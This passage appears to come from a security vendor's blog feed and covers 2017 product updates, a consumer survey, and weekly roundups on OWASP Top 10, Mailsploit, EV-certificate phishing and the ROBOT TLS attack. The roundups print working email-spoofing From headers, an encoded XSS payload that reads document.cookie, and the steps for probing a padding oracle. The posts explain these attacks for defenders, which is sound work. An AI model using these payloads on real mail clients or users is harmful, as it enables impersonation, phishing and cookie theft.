    The problem for Grammarly was that there was no CSRF protection in place. Specifically, Grammarly's online service had no CSRF protection for its login and logout functionality. Some may argue that this is not a significant issue. It can become significant, however, when combined with other vulnerabilities, particularly when these other vulnerabilities may not be otherwise reachable. There certainly was a detrimental effect in this case, where it had a direct impact on the confidentiality of users' data.

    Netsparker can reliably detect Cross-Site Request Forgery vulnerabilities in login forms among others. If you are unsure whether your website is properly protected against this type of attack, download the free demo of Netsparker Desktop to see how many vulnerabilities it can identify on your websites.

    September 2017 Update of Netsparker Cloud

    $
    0
    0

    We are very happy to announce the September 2017 update of Netsparker Cloud. In this update, we included new features, a good number of improvements, new security checks and numerous bug fixes. Here is an overview of what is new and improved in this September 2017 update of Netsparker Cloud.

    New Features

    Configurable List of Parameter Names for Improved Handling of Anti-CSRF Tokens

    We love automation! Netsparker can scan a website that uses Anti-CSRF tokens, without you having to disable them. Now you can also add a list of parameter names that use Anti-CSRF tokens,  so the scanner can scan them successfully, without being hindered by the Anti-CSRF tokens.

    Configurable List of Parameter Names for Improved Handling of Anti-CSRF Tokens

    Attacking Optimization Options for Recurring Parameters on Different Pages

    When this option is enabled, Netsparker will identify the same parameters that are used on multiple pages, so not to scan them multiple times. Some examples of such parameters are search widgets, newsletter subscription and similar forms. Such setting can be enabled from the Attacking section of a Scan Policy.

    Attacking Optimization Options for Recurring Parameters on Different Pages

    Support for Multiple Configured Credentials

    In Netsparker Cloud now it is possible to configure multiple Basic, NTLM and Digest authentication credentials for the same target. So if your website has multiple password protected areas, and each of them requires different credentials, or use different authentication mechanisms, you can configure them in Netsparker Cloud and scan all password protected areas in one single scan.  For more information on how to configure multiple sets of credentials refer to the section Configuring multiple sets of credentials and URLs in the document Configuring Basic, NTLM & Digest Authentication in Netsparker.

    Other Notable Features

    In this September 2017 update of Netsparker Cloud we have also added the following:

    • Ability to configure custom HTTP headers for a scan
    • Added the new Site Profile node in the Knowledge Base

    New Security Checks & Product Improvements

    In this update, we included numerous new security checks, product and security checks improvements. Since the list is too long (yes we really worked hard over the summer) we cannot include it in this blog post. Please refer to the Netsparker Cloud changelog for a detailed list of what is new, improved and fixed in this update of Netsparker Cloud.

    November 2017 Netsparker Desktop Update

    $
    0
    0

    Today, we are delighted to announce a new update of Netsparker Desktop web application security scanner. In this update, we have improved some of the security checks and made several performance enhancements. But, most importantly, we have added new features that will help you automate more. This announcement highlights what is new and improved in this latest update.

    Configuring Web Storage Data (Local/Session) for a Website

    In the Scan Policy, you can now configure both Local and Session Web Storage Data for a target website. This is useful when you need to provide a token and its value prior to the scan.

    As illustrated in the screenshot, to configure Web Storage data, navigate to the Web Storage menu and specify the Type, Key, Value and Origin.

    Configuring Web Storage Data (Local/Session) for a Website

    New Parse From URL Feature for Form Values

    In Netsparker web application security scanner, you can pre-configure the values the scanner uses when traversing web forms. In this update, we added a new feature called Parse From URL, which you can use to automatically extract a list of parameters and their types from a web form, instead of having to dig through the HTML code. It's pretty neat, isn’t it?

    New Parse From URL Feature for Form Values

    Support for HTTP Header Authentication

    When scanning a website that requires authentication, you can easily configure the Form Authentication if it uses web forms, or specify the credentials in the Scan Wizard if it uses Basic, Digest, NTLM or similar authentication mechanisms.

    With this update, if for some reason, you need to manually add HTTP authentication headers prior to a scan, you can easily do so from the Headers section in the Scan Wizard, as illustrated in the screenshot.

    Support for HTTP Header Authentication

    To add a new HTTP Authorization header, click Add Authorization Header, select the type of authentication you are using and specify the Value.

    Other Updates and Improvements in the Netsparker Desktop November Update

    In this update we also:

    • Changed one of the vulnerability severity names from 'Important' to 'High'
    • Updated several external references in vulnerability reports
    • Improved the default form values' settings
    • Improved scan stability and performance
    • Improved the DOM simulation for a number of specific events
    • And much more!

    For a comprehensive list of new features, improvements and fixes in the November update of Netsparker Desktop web application security scanner, please refer to the changelog.

    Explanation & Demo of the Content Security Policy (CSP)

    $
    0
    0

    Scanning a web application for vulnerabilities and ensuring it is secure is certainly a good thing to do. Though there are other things you can leverage to improve the security posture of your web applications, such as Content Security Policy (CSP).

    Watch our security researcher Sven Morgenroth deliver a presentation and demo about CSP during episode #536 of Paul’s Security Weekly. During the podcast Sven;

    • Explains what is CSP,
    • Explains some CSP directives and how to use them,
    • Shows some of the most common mistakes one can make when configuring CSP,
    • Explains how CSP helps in preventing Cross-site Scripting vulnerabilities on your web applications.

    During the podcast, Sven also makes a demo and shows the effect Content Security Policy directives have when used to protect a web application and also highlights some best practices. Sven also shows how you can use the Netsparker web application security scanner to ensure your Content Security Policy is airtight, or better, hacker tight!

    Slides for Content Security Policy Presentation & Demo

    Below are the slides Sven used during the presentation and demo of the Content Security Policy.

    Consumers Survey Results: Web Applications Most at Risk of Getting Hacked & Consumers’ Online Risky Behavior

    $
    0
    0

    Earlier this year, we conducted a survey to discover consumers’ major concerns when shopping online. The answers were not surprising. A whopping 77.6% of respondents worry about websites being hacked.

    But are these same consumers also concerned about their own devices getting hacked? And do they do enough to protect them? In the same survey we asked consumers about how they use their personal devices. Here are the results.

    Are Consumers at Risk of Cyber Attacks?

    The answer, unfortunately is a resounding yes. Eighty percent of our respondents admitted doing things online that put them at risk. The most popular were:

    • Using open, unsecured wifi networks
    • Clicking on social media links that are not familiar
    • Using the same password for all logins
    • Using weak passwords

    Are Consumers at Risk of Cyber Attacks?

    Are Consumers Protecting Themselves?

    Even though many consumers take risks, 85% of respondents said that they also take actions to protect their privacy and their data. For example:

    • 46% said they deleted their history and cookies when using a public computer
    • 38% of the respondents turn off location services on their phones
    • 19.4% tape over their laptop camera (but they should visit our booth at events we attend, where we give out web cam covers for free!)

    Are Consumers Protecting Themselves?

    Are Any of The Respondents Paranoid?

    Considering 80% of the respondents take risks online, this one is quite a surprise! Twenty-three percent of respondents said that when they book a property via Airbnb, they go through every room to check for cameras and electronic devices!

    Do People Use the Same Password for All Online Logins?

    85.5% of the respondents claim that they request a new password each time they need to login to a website. That’s a bit unpractical, but also unnecessary since the advent of password management software. However, it's just as silly to use the same password for all online logins. Here are some interesting statistics on that point. It's more than a little worrying to see that 84.8% of respondents use the same password, or a limited number of passwords, for their online logins.

    Do People Use the Same Password for All Online Logins?

    What Services and Data Are Respondents Most Concerned About?

    One of the most eye-watering statistics we uncovered was the 15% who said that they were not at all concerned whether hackers accessed any of their data or services! We have to conclude that these consumers simply do not understand the implications of having their data hacked. As for the rest, most were concerned about their email accounts, not surprising as it is one of the services regular consumers use most – for signing up to online services of all kinds, opening bank accounts, contacting lawyers, applying for jobs or even arranging mortgages, for example. The statistics in this category were as follows:

    • 57% Email accounts
    • 40.4% Files
    • 30.2% Browser history

    Here is the graph with all the possible responses and figures.

    What Services and Data Are Respondents Most Concerned About?

    How Often Are Smart Home Devices, Computers and Mobile Gadgets Updated?

    There are many security best practices consumers can follow to ensure their online security. One of the most crucial, and easiest, is to maintain updates on the devices and software you use. So, do people keep their phones, computers and tablets up to date?

    • 20.25% never update their smart home devices
    • 7.4% never update their computer's operating system
    • 7.2% never update their mobile phone or tablet

    These numbers are pleasingly low, indicating that more and more people are aware of the need for regular updates. However, check out the other side of the coin:

    • 24.5% don’t know that smart home devices need to be updated
    • 6.1% don’t know that their computer's operating system needs to be updated
    • 5.5% don’t know that mobiles and tables need to be updated

    Clearly, work is needed to raise awareness on smart home devices (also known as 'the Internet of Things' or 'IoT'). Now comes the really worrying part.

    Who Should Be Held Responsible for Hack Attacks That Happen Because the Software Was Not Up to Date?

    While 52% of respondents believe that the device owner should be held responsible for the hack attack (and we agree!), many others have other ideas:

    • 33% believe the device provider should be held responsible
    • 21% believe a third-party security company should be held responsible
    • 14.2% believe that the government should be held responsible

    It seems that many neither inform themselves well enough on what they are going to purchase, nor read the fine print. It also could be the case that vendors are not doing enough to explain things to consumers, who, it could be argued, cannot be expected to keep up to date with the myriad and finer points of web vulnerabilities.

    Who Should Be Held Responsible for Hack Attacks That Happen Because the Software Was Not Up to Date?

    Which Technologies Are Most at Risk of Future Hacks?

    We left the most important question for last. If you are involved in the IT security industry, it is an easier job to keep yourself current with what security risks exist, which ones enable hacks and how protect yourself. You probably also have a very good understanding of which technologies, devices and software are targeted most, and why.

    But what about consumers? What about those who do not work in the IT security industry? Which technologies do they think are most at risk of future hacks? The answers are not surprising because they are basically a reflection of what people hear in mainstream media:

     Which Technologies Are Most at Risk of Future Hacks?

    Web Applications Are at Most at Risk of Being Hacked

    Could this answer be the result of everyone hearing about web application hacks, as reported in mainstream news? Or do consumers think that web applications are most at risk because they are more exposed to them (online services)? It's difficult to tell, though there is certainly room for improvement on both the part of companies who build web applications and consumers who use them.

    So How Can We Reduce the Risks of Being Hacked?

    Hackers are clever; consumers need to be clever too. As consumers, couldn't we all become more active in helping to secure our own data? We've all bought products without researching them and signed up to services without examining the terms. We use the same or similar passwords for multiple logins and don't change them regularly. We enable features that we don't understand. And we fail to update our devices. This article sets out some really simple steps consumers can take to chip away at the ease with which hackers exploit one of the biggest web vulnerabilities of all – indifference.

    Web application development companies in turn can do three things to reduce the risks to both them and the data of those who buy and use their products:

    1. Cultivate a development environment where building more secure web applications becomes a central part of the SDLC
    2. Educate and update uninformed consumers on the significant risks they are subject to, and some very basic steps they can take to reduce them
    3. Take advantage of the web application security solutions available on the market and scan their web applications for vulnerabilities, before malicious attackers do!

    December 2017 Update for Netsparker Cloud

    $
    0
    0

    We're almost at the close of 2017. But, before it ends, we wanted to present you with a seasonable gift – a huge update to Netsparker Cloud, our web application security scanning solution. This blog post highlights what is new, improved and fixed in the December 2017 update of Netsparker Cloud.

    Real Time Scan Results

    One of the most common problems in online services is that users have to wait until a scan is complete to see the results. Not in Netsparker Cloud!

    Like Netsparker Desktop, Netsparker Cloud now displays scan statistics in real time. As soon as Netsparker Cloud identifies a vulnerability, it reports it and displays all the details while the scan is still running. This empowers you to take action immediately.

    Real Time Scan Results

    Integration Support with Fogbugz, Github and TFS Issue Tracking Systems

    A few months ago we announced the integration with JIRA, an issue tracking system, which enabled you to configure the automated posting of vulnerabilities as issues in JIRA projects.

    In this latest update, we added integration support for FogBugz, Github and Team Foundation Server (TFS). You can now use the Integration wizard to integrate Netsparker Cloud with your issue tracking system in mere minutes.

    Integration Support with Fogbugz, Github and TFS Issue Tracking Systems

    Option to Group Email and SMS Notifications

    Notifications are really important. They keep you posted when scans start and finish, and alert you to critical issues. Yet, when you receive lots of notifications, instinctively, you might start to ignore them.

    To avoid this, we've introduced a new option that allows you to group notifications within a time period. All you have to do is enable the Group option for every notification, and specify the period during which notifications should be grouped.

    Option to Group Email and SMS Notifications

    For example, if you set this period as 30 minutes, all notifications generated within 30 minutes of each other will be grouped and sent as one. If, for example, three scans finish within thirty minutes of each other, you will receive a single email (not three) with a summary about each scan. Genius!

    Other Noteworthy Updates

    In this update, we also included the following:

    • New Scan Policy setting to define Web Storage (Session and Local)
    • New options to schedule incremental scans
    • Support for importing links from a CSV file
    • Support for parsing gzipped sitemaps
    • Many other improvements and bug fixes

    For a complete list of what is new, improved and fixed in this end-of-year update of Netsparker Cloud, please refer to the Changelog.


    Netsparker's Weekly Security Roundup 2017 - Week 51

    $
    0
    0

    Finally – OWASP Top 10 2017!

    Although, the OWASP Top 10 vulnerability list is not a mandatory web security standards document, it plays a significant role in the cyber-security sector, not least because it is compiled based on data collected by the web security community, and has set the agenda since its first publication in 2004.

    A full four years since the last list (2013), OWASP has finally published its up-to-date Top 10 vulnerability list. It overcame much initial opposition, some controversial items were removed and some were revised during the preparation process.

    A preliminary, contentious draft was first published in April 2017. OWASP proposed the inclusion of A7: Insufficient Attack Protection, which many felt included a not terribly well-disguised reference to Contrasts Security, a company who recommended the item in the list and that develops a Web Application Firewall (WAF) product. Naturally, this was met with opposition. After some changes, it was incorporated into another article and ranked 10th place as Insufficient Logging and Monitoring. There was also an entry for API Security in the first draft. However, it didn't make it into the final version.

    The final 2017 list has a lot of similarities when compared to the Top 10 - 2013. However, some vulnerabilities that OWASP removed in the current version – such as Open Redirection and CSRF, the latter of which was called 'the sleeping giant' in OWASP documents – are known to have a huge impact on the security of web applications.

    These are, by far, not the only changes to the new list:

    • Insecure Direct Object References (IDOR), which is amongst the vulnerabilities with the highest impact regarding mobile security, was merged with Missing Function Level Access Control and became the new A5: Broken Access Control
    • Insufficient Logging & Monitoring, XML External Entity (XXE) and Insecure Deserialization were added in OWASP Top 10 2017 RC2 as brand new vulnerabilities.

    Cross-site scripting (XSS) vulnerabilities have been downgraded from 3rd to 7th place in the 2017 list. This could have been influenced by new client-side security measures, such as Content Security Policy and XSS filters, that are built into most modern browsers.

    This is a screenshot of the table contained in the Release Notes section of the 2017 publication, revealed what was removed, added or merged in comparison with the previous version (2013).

    This is a screenshot of the table contained in the Release Notes section of the 2017 publication, revealed what was removed, added or merged in comparison with the previous version (2013).

    For a more detailed explanation of all the security flaws listed in the list see OWASP Top 10 2017.

    Mailsploit

    From the 1990s to the 2000s, it was relatively easy for scammers to fake a sender’s email address. One of the main vulnerabilities at the time was facilitated by a series of bugs in email clients that enabled hackers to change the From: header.  It was dubbed Mailspoilt by Sabri Haddouche, the Researcher who found it.

    Though since the advent of Domain Message Authentication Reporting & Conformance (DMARC), that type of hack is getting much more difficult to accomplish. DMARC is enabled by setting a few specific values using Domain Name System (DNS) records: Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM).

    RFC 1342 Representation of Non-ASCII Text in Internet Message Headers

    These new security measures are implemented by most, if not all, popular email services. But those precautions are ineffective if email services and clients display the wrong sender name to the user.

    Shockingly, this is exactly what happened to thirty email services in 2017. The culprit was a detail in RFC 1342 Representation of Non-ASCII Text in Internet Message Headers, a Internet Activities Board (IAB) Official Protocol Standards document (memo) that described how the developers of email clients should handle non-ASCII text in the From: header.

    This is how the vulnerability works. ASCII values are expected in all fields in an email message. The From: field is one of them. RFC 1342 contains an interesting detail – the Mailsploit vulnerability occurs due to the following explanation:

    • A mail composer that implements this specification will provide a means of inputting non-ASCII text in header fields, but will translate these fields (or appropriate portions of these fields) into encoded-words before inserting them into the message header.
    • A mail reader that implements this specification will recognize encoded-words when they appear in certain portions of the message header. Instead of displaying the encoded-word "as-is", it will reverse the encoding and display the original text in the designated character set.

    According to the RFC 1342, mail clients that want to adhere to the specification must be able to decode properly encoded non-ASCII characters within the header fields. It can done like this:

                   =?utf-8?b?[BASE-64]?=

                   =?utf-8?Q?[QUOTED-PRINTABLE]?=

    Most email clients and email services overlooked a dangerous pitfall at this point – decoded values may contain dangerous characters such as null bytes and new lines. Adding these characters cuts off the domain part of the sender's email address, making it possible to effectively change the sender address that the user sees to an arbitrary one.

    RFC 1342 states:

    • The client on iOS is vulnerable to a null-byte injection
    • The client on macOS is vulnerable to an email(name) injection

    A  payload that combines both vectors works perfectly across all operating systems. Let's examine a From header field:

    From: =?utf-8?b?${base64_encode('potus@whitehouse.gov')}?==?utf-8?Q?=00?==?utf-8?b?${base64_encode('(potus@whitehouse.gov)')}?=@mailsploit.com

    This is the payload after the encoding process:

    From: =?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?==?utf-8?Q?=00?==?utf-8?b?cG90dXNAd2hpdGVob3VzZS5nb3Y=?=@mailsploit.com

    The above header field which is decoded by the Mail.app, becomes this one:

    From: potus@whitehouse.gov\0(potus@whitehouse.gov)@mailsploit.com

    The email's sender would be displayed as potus@whitehouse.gov in both macOS and IOS. This is what is really going on:

    • iOS will discard everything after the null-byte (the part after the \0 character)
    • macOS ignores the null-byte, but will stop after the first valid email it sees (due to a bug in the parser)

    Why Did Email Service Precautions Not Work?

    While the email client mistakenly shows potus@whitehouse.gov, DKIM and SPF verifications come from the @mailsploit.com domain. Since this is the host where the mail is coming from, all checks are passed. This is because the bug is in the code that displays the sender's address, but not in the code that checks the DMARC-related records.

    Was it Simply Sender Address Spoofing?

    Unfortunately not! It wasn't simply that null bytes and new line characters could be added. Even encoded XSS payloads could have been injected into the From: section. After the decoding process, the unsanitized XSS payload would remain.

    A series of services were affected by this kind of XSS attack in the From: header. For example both HushMail and Open Mailbox email services were happily running malicious HTML code as seen in the following video.

    A mail header containing an encoded XSS payload may look similar to this one:

    From: =?utf-8?b?c2VydmljZUBwYXlwYWwuY29tPGlmcmFtZSBvbmxvYWQ9YWxlcnQoZG9jdW1lbnQuY29va2llKSBzcmM9aHR0cHM6Ly93d3cuaHVzaG1haWwuY29tIHN0eWxlPSJkaXNwbGF5Om5vbmUi?==?utf-8?Q?=0A=00?=@mailsploit.com

    The mail client will decode the From: header above to this payload:

    From: service@paypal.com<iframe onload=alert(document.cookie) src=https://www.hushmail.com style="display:none"\n\0@mailsploit.com

    For further information on the vulnerability, see Mailspoilt.

    Extended Validation Certificate (EV) – A New Way of Phishing

    Statistics show that the use of Secure Sockets Layer and Transport Layer Security (SSL/TLS) protocols is increasing by the day. However, SSL, at least, is a double-edged sword. It can have many security advantages but scammers that employ phishing websites often use certificates for hoodwinking their victims.

    There are three type of certificates for websites. Domain Validation (DV), Organizational Validation (OV) and Extended Validation (EV). OV and DV certificates resemble each other. Depending on the browser, they usually display a green padlock to the left of the address bar. EV certificates display the green padlock too, but also the name of the corporation as well as country information. (Look at your browser's address bar right now to see an example.)

    Unfortunately there are some inconsistencies when it comes to displaying EV certificate information across browsers. For further technical details, see Scott Helme’s recent blog post, Are EV certificates worth the paper they're written on?.

    Security Research With EV Certificates

    Even though getting EV certificates is tough, since you need to have a registered company, two Security Researchers have published their experience of how they were able to get EV certificates without problems, and how they could have used them for phishing attacks.

    Exploiting Browsers' EV Certificate Ownership Information Positioning

    The first experiment was conducted by James Burton. He applied Symantec’s EV certificates for a company he registered, which he called 'Identity Verified'. It turns out that registering a company and obtaining such a certificate only costs about £40. He also used a free, one-month plan from Symantec.

    In the Safari browser on a site with an EV certificate, the company name overlaps the address bar in its entirety (see above). In this example, all the user sees in the address bar is the phrase 'Identity Verified'.

    Why he chose this company name is pretty obvious. In the Safari browser on a site with an EV certificate, the company name overlaps the address bar in its entirety (see above). In this example, all the user sees in the address bar is the phrase 'Identity Verified'.

    This is what it would look like on a cellphone.

    This is what it would look like on a cellphone.

    So, when an unsuspecting user sees this above a Google login page, the user naturally assumes that it's Google's identity that is verified. A phishing attempt using this technique will most likely be highly effective!

    The situation is different in Firefox and Chrome. In Firefox, the website's registered company name is displayed to the left of the address bar.

    The situation is different in Firefox and Chrome. In Firefox, the website's registered company name is displayed to the left of the address bar.

    Chrome is similar. While you can also see the address bar, you could still use a phishing domain, incorporating a logo that matches the one used in the Identity Verified popup. This is much more difficult for a hacker to to achieve though, because they would most likely get detected while acquiring an EV certificate. Read all the details about this EV certificate experiment.

    Chrome is similar. While you can also see the address bar, you could still use a phishing domain, incorporating a logo that matches the one used in the Identity Verified popup.

    Gaming EV Ownership With Stripe

    Ian Carroll was another Security Researcher who conducted a similar experiment. He used a slightly different approach to James Burton. The company name and country information are displayed on the address bar. The company he registered for the experiment was called 'Stripe, Inc'. If that sounds familiar, it is probably due to the fact that there is a popular payment processing company with the same name!

    So, when you visit the website he registered, https://stripe.ian.sh/, you will see 'Stripe Inc US' to the left of the address bar.

    So, when you visit the website he registered, https://stripe.ian.sh/, you will see 'Stripe Inc US' to the left of the address bar.

    The website’s EV certificate belongs to Comodo. But, when you see 'Stripe, Inc [US]', you probably think of the real Stripe Inc (the payment processor from Delaware).  However, this website is Ian’s company in Kentucky. Only the state is different. This confusion is easily caused because the US has very large states that operate, in some ways, like countries do elsewhere. This enables some disconnection when it comes to company names.

    We’ve mentioned Safari's behavior above. In this example, the other browsers fare no better! Chrome and Firefox will also display 'Stripe, Inc [US]' as the EV's ownership. You can read more about the vulnerability on Ian's website.

    It is very difficult for the average user to spot  this type of phishing site.

    .dev Support From Google!

    Google has been a central driving force behind the widespread adoption of Transport Layer Security (TLS). Since 2010, Google used HTTPS for Gmail, and it also reserved the better spots on its search results pages for websites that used SSL. Naturally, this strong stance helped to increase the popularity of SSL elsewhere. In addition, Google was the golden sponsor for Let’s Encrypt (even Netsparker sponsors Let’s Encrypt), which provides SSL certificates free of charge.

    At the beginning of 2017, Google began warning users about websites with insecure HTTP connections, by displaying the 'Not Secure' notification. It was a giant leap forward that helped to push HTTPS and insecure connections into the spotlight, particularly for average users.

    Then, Google crowned its efforts with a brand new move: they announced that they will include .dev Top Level Domains (TLDs) into their HSTS preload list. As a result of this, .dev domains need to be served over HTTPS. This move includes .foo domains.

    If HTTPS is not enforced, a malicious attacker executing a man-in-the-middle (MITM) attack could serve an otherwise encrypted website over unencrypted HTTP. For this reason, it's important to serve your website exclusively over a secure connection if the transmission of sensitive data is involved. It might also be the case that there is an invalid SSL certificate that the attacker issued for the attacked website. Users might just click through the warning prompt to get to the content they wanted to see. HSTS ensures that insecure connections with invalid certificates are forced over HTTPS encryption.

    This sounds like a good thing. The problem is that HSTS is usually activated through an HTTP response header. So does that mean that an attacker could just remove the header from a plain HTTP response? Unfortunately that's a very real threat! HSTS is based on the Trust on First Use (TOFU) methodology. This header has to be set upon the first connection. However, there is an easy way to enable HSTS for a site, even if it was never even visited by the browser. In Google Chrome this is done by adding a site to the so-called HSTS preload list. This is a hardcoded list in the source code of the Chrome browser. If a user wants to visit a site, Chrome will check whether or not the site is mentioned in this list. If it finds the site, it will enable HSTS, even if it was never previously visited by the browser.

    Adding your website to the list requires a few steps. It also takes some time until the changes take effect, as the new list will only be distributed once a new chrome update is released. Since .dev and .foo domains are mostly used in a development environment, and are not public, it's not possible to add them to the list. In fact the .dev top level domain is a valid TLD. However, Google is the owner of this extension and uses it for internal purposes only.

    With its latest change, Google now forces developers to either enable HTTPS in their development environment or use one of the TLDs below. They are specifically recommended for development environments:

    • .test
    • .example
    • .invalid
    • .localhost

    If you are interested in this topic, you can read Google's blog post, Broadening HSTS to secure more of the Web.

    Recon is Everywhere!

    Recon is an abbreviation of the word 'reconnaissance'. In our context, it refers to exploration in order to gather lots of information as efficiently as possible. According to some experts in the field, it is the most important step of every penetration test.

    One of our select friends in web security, with the coolest job title ever, Attack Developer, Evren Yalçın, wrote Recon is Everywhere from his unique viewpoint. It includes some really helpful hints for penetration testing aficionados.

    Company Logos

    Have you ever wondered whether you have missed some web pages during the reconnaissance phase of your penetration testing? More often than not, pages exist that even their owners have forgotten. Long ago campaign pages, shareholders or products websites are just a few examples. You can find inactive company web pages using Google’s Reverse Image Search functionality. Simply upload your company logo and you could discover some forgotten websites.

    Copyright

    Another interesting trick is to conduct a search for the copyright text that is often found at the bottom of a company web page. For example, if you want to find pages belonging to example.com, you could type "© 2017 example.com" into Google.

    Humans.TXT

    The humans.txt file aims to provide website visitors with information on who participated in creating the application. Not only is it a great way to know who coded the website, but it's a lamentably straightforward way for attackers to find related github pages, and gain more information about a company and its staff.

    Reverse Analytics

    Using Google to track what visitors are doing on your website, or gather statistics on how many people you can reach with your content, involves adding a piece of javascript code with a unique identifier to your site. This enables Google to distinguish between websites, and present you with the correct data for your page.

    This is an example of the code snippet used.

    Reverse Analytics - This is an example of the code snippet used.

    The problem is that if you use the same tracking code across different websites, an attacker can easily find all different websites that use it. This also means that the attacker can find all the pages that you set up and therefore find outdated websites that you forgot about. There are two tools that simplify this process: http://www.gachecker.com/ and http://moonsearch.com/analytics/.

    ROBOT Attack Revives a 19-Year Old Vulnerability

    $
    0
    0

    Daniel Bleichenbacher was the security researcher who first discovered, in 1998, that PKCS #1 v1.5 padding error messages sent by a Transport Layer Security (TLS) stack running on a server could enable an adaptive-chosen ciphertext attack. When used in conjunction with RSA encryption, this attack completely shattered TLS confidentiality.

    What Is the ROBOT Attack?

    ROBOT stands for Return Of Bleichenbacher's Oracle Threat – the return of the original vulnerability that enabled hackers to perform RSA decryption and signing operations with a TLS server's private key (without needing the key itself).

    Even though it has been known since the late 1990s, lots of web hosts remain vulnerable to attacks against RSA in TLS.

    ROBOT Attack Logo

    How Does the ROBOT Attack Work?

    An attacker can simply send Client Key Exchange (CKE) messages – with wrong paddings – while a TLS-RSA handshake is being negotiated. Then, depending on the server's response to these modified CKE messages, the attacker can determine whether the server provides an oracle that renders the server vulnerable. If they discover a vulnerable server, the attacker will be able to decrypt any ciphertext, or sign any data, with the server's private key. To do so, the attacker first needs to passively record a certain amount of encrypted traffic. The amount of the traffic that needs to be recorded is determined by the strengthof the provided oracle.

    Attack Performance and Oracle Types

    Bleichenbacher's article explains that the strength of the provided oracle determines the impact of the attack:

    • What happens is that with every new and valid oracle response, the attack algorithm finds a new interval (if the decrypted ciphertext begins with '0x0002')
    • It is thought to be weaker if it sends a negative response (for some decrypt ciphertexts that begin with '0x0002'), resulting in no new intervals

    In the second situation, the attack would need to create additional queries.

    When using the strongest oracle, 10,000 queries on average will be enough; however, when using the weakest oracle, about 18,000,000 queries will be needed to decrypt a ciphertext. All the other oracles lie between these two in exploitability terms.

    For simplicity, the ROBOT attack paper assumes there are two types of oracle:

    • The strong oracle, which needs less than a million queries
    • The weak oracle, which needs at least several million queries

    Anatomy of a ROBOT Attack Query

    As stated earlier, an attacker needs to send modified CKE messages – with incorrect paddings – while a TLS-RSA handshake is being negotiated, in order to get an oracle from a vulnerable server.

    Based on the previous research on the Bleichenbacher attack, attackers need to create five different types of padding in order to trigger different vulnerabilities in the server. The padding types are outlined below.

    Correctly Formatted TLS Message

    This message contains a correctly formatted PKCS #1 v1.5 padding, with '0x00' in the correct position and the correct TLS version located in the pre-master secret.

    0x0002 [2]PAD0x00 [1]TLS Version [2]Random [46]
    Pre-master Secret

    This message should simulate an attacker who correctly guessed the padding as well as the TLS version. It's difficult to trigger (because of a low probability of constructing such a message), but it is needed to evaluate the server correctness.

    Incorrect Padding

    This message starts with incorrect padding bytes.

    0x4117 [2]PAD

    The invalid first bytes in the padding should trigger unexpected server behavior.

    0x00 Byte in the Wrong Position

    This message is in the correct format, but has '0x00' in the wrong position, so that the unpadded pre-master secret would have an invalid length.

    0x0002 [2]PAD0x0011

    Many implementations assume that the unpadded value has a correct length. If the unpadded value is shorter or longer, it could trigger a buffer overflow or specific internal exceptions, and lead to unexpected server behavior.

    Missing 0x00 Byte

    This message starts with '0x0002' but excludes the '0x00' byte.

    0x0002 [2]PAD

    If the '0x00' byte is missing, the PKCS #1 v1.5 implementation cannot unpad the encrypted value, which can again result in unexpected server behavior.

    Wrong TLS version

    This message contains an invalid TLS version in the pre-master secret.

    0x0002 [2]PAD0x00 [1]0x0202 [2]Random [46]
    Pre-master Secret [48]

    This message also should trigger unexpected behavior.

    How Hackers Reveal the ROBOT Vulnerability

    To construct all these padding variations, and get an oracle from the server, an attacker proceeds as follows:

    1. First, they start a TLS-RSA handshake and acquire the server certificate from the 'Server Hello' message.
    2. Next, they create CKE messages, as described above. Padding length should match the server certificate's public key length (key size of the public key, in bytes). Then, they encrypt the pre-master secrets using the server's public key.
    3. Next, they send constructed CKE variations, followed by valid Change Cipher Spec (CCS) and Finished messages. This is referred to as the 'Message Flow'.
    4. If the response is not the same for each test case, the target can be presumed to be vulnerable.
    5. If not, the attacker sends the same CKE messages but without following up with CCS and Finished messages (a shortened message flow), and waits for the Timeout.
    6. Again, if the response is not the same for each test case, the target can be presumed to be vulnerable.

    When testing with the shortened Message Flow, it is necessary to set an appropriate Socket Timeout for the network path between the client and the server.

    ROBOT Impact and Remediation

    When the ROBOT vulnerability was first discovered, it was estimated that "almost a third of the top 100 domains in the Alexa Top 1 Million list, among them Facebook and Paypal" were vulnerable to this type of attack. In addition, many other vendors and open source projects were also found to be vulnerable.

    For a complete list of who is affected, refer to the ROBOT Attack website. If you use one of the products that provides a fix, you should, of course, install the update.

    Do Not Use RSA Encryption Modes!

    However, to prevent such vulnerabilities on your host, it would be better to disable RSA encryption modes. This is not the first time a variation of Bleichenbacher's padding oracle attack has surfaced to exploit RSA encryption modes. Previously there was another attack, DROWN (Decrypting RSA with Obsolete and Weakened eNcryption), which also allowed an attacker to break the encryption. Moreover, RSA encryption modes also lack forward secrecy.

    In a nutshell, the fact that RSA encryption modes are so exploitable means that disabling them is the best policy. This refers to all ciphers that begin with 'TLS_RSA'. This does not include ciphers that use RSA signatures and include 'DHE' or 'ECDHE' in their name; they are unaffected by the ROBOT attack.

    Scanning for the ROBOT Vulnerability with Netsparker

    We released a Netsparker web application security scanner hotfix version that included ROBOT checks on December 22. To make sure Netsparker includes the ROBOT checks in your next scan, simply open the relevant Scan Policy and enable the SSL Security Check Group.

    Scanning for the ROBOT Vulnerability with Netsparker

    In addition, if you want only to check your host for the ROBOT vulnerability you can create a new Scan Policy with only the SSL Security Check group enabled.

    To limit the scan to SSL checks only you can also disable JavaScript Analyzer in the Scan Policy, and run the scan with the Scan Imported Links Only option by adding your host's root path to Imported Links. Remember that a host can run different TLS stacks on different domains. Often the host starting with 'www' is served by a different TLS stack than the host without the 'www' prefix. Therefore, add both forms to Imported Links, or scan both.

    The ROBOT Attack Whitepaper

    For all the technical details on the ROBOT attack read the Return Of Bleichenbacher’s Oracle Threat (ROBOT) whitepaper by by Hanno B¨ock, Juraj Somorovsky1 and Craig Young.

    Netsparker's Weekly Security Roundup 2017 - Week 52

    $
    0
    0

    Preload Saves Lives

    Thanks to Google and projects such as Let’s Encrypt, there are more websites running on SSL/TLS now than a few years ago, which means the internet in general is getting more secure.

    The HTTP Strict Transport Security (HSTS) Preload List is a key element of SSL/TLS for web browsers. The problem is that if a website makes traffic encryption optional, it can be bypassed by Man in the Middle (MiTM) attacks.

    Moxie Marlinspike (pseudonym), founder of Open Whisper Systems, is an American security researcher who demonstrated at Blackhat in 2009 how he was able to prevent victims from using secure HTTPS connections and force them to use an unencrypted, plain HTTP connection instead. In order to do this he leveraged his SSLStrip tool. Theoretically, when a secure connection is established, it ensures both security and privacy. However, to establish a truly secure connection, HSTS is required. Websites that have HSTS configured instruct users' browsers to convert all future links to HTTPS.

